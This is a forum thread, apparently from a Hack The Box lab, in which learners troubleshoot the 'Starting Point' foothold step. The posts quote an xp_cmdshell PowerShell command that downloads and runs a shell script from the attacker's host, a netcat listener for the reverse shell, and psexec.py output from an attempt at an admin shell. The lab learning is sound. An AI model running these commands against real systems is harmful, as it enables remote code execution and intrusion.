Starting Point Foothold

I am in the foothold step of starting point and get an error:

“Unable to connect to the remote server”

This is when I am trying to run the command on the 10.10.10.27 box xp_cmdshell "powershell “IEX (New-Object Net.WebClient).DownloadString("hxxp://10.10.14.3/shell.ps1");”

I have been trying to figure it out but just stuck at this point. I can access the http server locally from my machine and see the shell.ps1 file in the directory but just unable to get this connection.

I ran the ufw commands and it shows the Rules updated, not sure if there might be a config that needs to be changed on the router to allow this through or not.

I have the same problem :cry:

Should I be able to ping the 10.10.14[.]3 from the 10.27 box?

I solved mine , @turboedbird when you run the powershell command you have to enter your ip address which you can find with sudo ifconfig and specify port 80 for example x.x.x.x:80 .

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

Type your comment> @limbernie said:

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

Thanks, figured it was something I was overlooking. I was able to connect.

When I try running this command I get this error: bash: syntax error near unexpected token `(’

I changed my ip adress in my ps1 file but I’m not sure why I’m getting this error

@zillakami did you found the solution by any chance ?? I am at same stage with same problem ?? Any help would be appreciated.

@FaridKhan

@FaridKhan Make sure you’re following the directions very closely. When you run the command, make sure you’re still in that mssqlclient.py command.

Hello all, in the last step, I am not able to get the shell
psexec.py administrator@10.10.10.27

[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file UndBnlSC.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service hFWB on 10.10.10.27.....
[*] Starting service hFWB.....
[!] Press help for extra shell commands
[*] Process   finished with ErrorCode: 1, ReturnCode: 0
[*] Opening SVCManager on 10.10.10.27.....
[*] Stoping service hFWB.....
[*] Removing service hFWB.....
[*] Removing file UndBnlSC.exe..

Has anyone faced this issue?

Type your comment> @limbernie said:

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

hello @limbernie

when i run this command i can see http call being made in my terminal but nothing happens afterwards

i have changed my ip in both above command and in shell.ps1
please help me